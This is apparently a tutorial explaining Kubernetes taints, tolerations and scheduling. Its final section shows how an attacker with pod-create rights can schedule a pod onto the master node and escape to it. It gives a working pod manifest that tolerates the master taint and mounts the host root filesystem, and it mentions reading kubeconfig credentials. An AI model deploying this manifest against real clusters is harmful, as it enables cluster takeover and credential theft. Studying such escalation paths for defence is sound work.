Understanding Taints and Tolerations
In simple terms:
- Taints: Nodes marked with taints will not have pods scheduled to them by the Kubernetes scheduler.
- Tolerations: Allow the scheduler to deploy pods to nodes that have taints applied.
Taints
Taints contain three possible values:
NoSchedule: Pods will not be scheduled to nodes marked with this taint.PreferNoSchedule: A softer version of NoSchedule - the scheduler will try to avoid scheduling pods to these nodes.NoExecute: When this taint is applied, any running pods on the node without matching tolerations will be evicted. This prevents scheduling new pods and also evicts existing ones.
To check taints on a node:
kubectl describe node <node-name>
Why Use Taints?
Every request in a Kubernetes cluster goes through the master node's kube-apiserver, making the master node critically important. Typically, pod applications are not deployed on master nodes. By applying taints to master nodes, we prevent pods from being scheduled to these machines. Tolerations are used when we need to deploy specific pods to tainted nodes, such as master nodes.
Taint Tolerations
Tolerations are key-value attributes defined on Pod objects that configure which node taints the pod can tolerate. The scheduler will only schedule a Pod to a node if the Pod can tolerate the node's taints.
Taints are defined in the node specification, while tolerations are defined in the pod specification. Both use key-value data structures.
When defining tolerations on a Pod, two operators are supported:
Equal: Requires exact matches on key, value, and effect.Exists: Requires matching key and effect, but the value field must be empty.
For example, if a node has a NoSchedule taint, pods cannot be scheduled to it by default. However, by using a toleration, the pod might still be scheduled to that node, similar to how affinity works.
The Kubernetes Scheduler
The kube-scheduler is Kubernetes' default scheduler and part of the cluster control plane (master). For every newly created or unscheduled Pod, the kube-scheduler selects the optimal Node to run the Pod. Each container in a Pod has different resource requirements, and the Pod itself has specific needs. Before scheduling a Pod to a Node, the scheduler filters available Nodes based on these resource requirements.
Scheduler Function
When a pod is created, the creation request is submitted to the API server. After authentication and authorization, the API server stores the pod data in etcd and initializes the deployment resource. The scheduler then monitors the creation via list-watch mechanisms, applies scheduling algorithms to assign the pod to a specific node, updates this information in etcd, and finally the kubelet receives this information to create the containers.
Factors Affecting Pod Scheduling
- Pod Resource Limits: The scheduler checks if each node has sufficient resources to meet the Pod's requirements, such as CPU and memory limits.
- Node Selectors (nodeSelector): When creating a pod, node selectors can constrain the pod to run on specific nodes. This is the simplest recommended form of node selection constraints. The
nodeSelectorfield is added to the Pod specification to set the desired node labels. Kubernetes will only schedule Pods to nodes that have all the specified labels. - Node Affinity (nodeAffinity): Conceptually similar to
nodeSelector, node affinity allows constraining Pod scheduling based on node labels. It offers more flexibility than nodeSelectors, supporting simple logical combinations rather than just exact matches.
Exploiting Taints for Master Node Access
Attack Vector
With credentials that have Create permissions (typically obtained by escaping to a Node node through a privileged container), an attacker can deploy pods. By default, Pods cannot be scheduled to Master nodes. However, using taint tolerations, an attacker can create a Pod that gets scheduled to a Master node and then escape to the Master.
Default Master Node Taints
Querying a Master node's details reveals its marked with the taint: node-role.kubernetes.io/master:NoSchedule, which means Master nodes will not schedule Pods by default - they don't run workloads.
Creating a Tolerated Pod for Master Access
The following YAML creates a Pod with a toleration for the Master node taint, allowing it to be scheduled on the Master:
apiVersion: v1
kind: Pod
metadata:
name: privileged-master-access
namespace: default
spec:
tolerations:
- key: "node-role.kubernetes.io/master"
operator: "Exists"
effect: "NoSchedule"
volumes:
- name: host-volume
hostPath:
path: /
containers:
- name: attacker-container
image: busybox
imagePullPolicy: IfNotPresent
volumeMounts:
- name: host-volume
mountPath: /host
command: ["/bin/sh", "-c", "while true; do echo 'Pod running on master node'; sleep 60; done"]
serviceAccountName: default
By repeatedly creating such containers, an attacker can successfully deploy pods on the Master node. Since this container mounts the host's root directory (the Master node's root directory), the attacker can gain arbitrary control over the host system.
From there, an attacker can read sensitive files like the kubeconfig configuration, which contains credentials for accessing the Kubernetes cluster.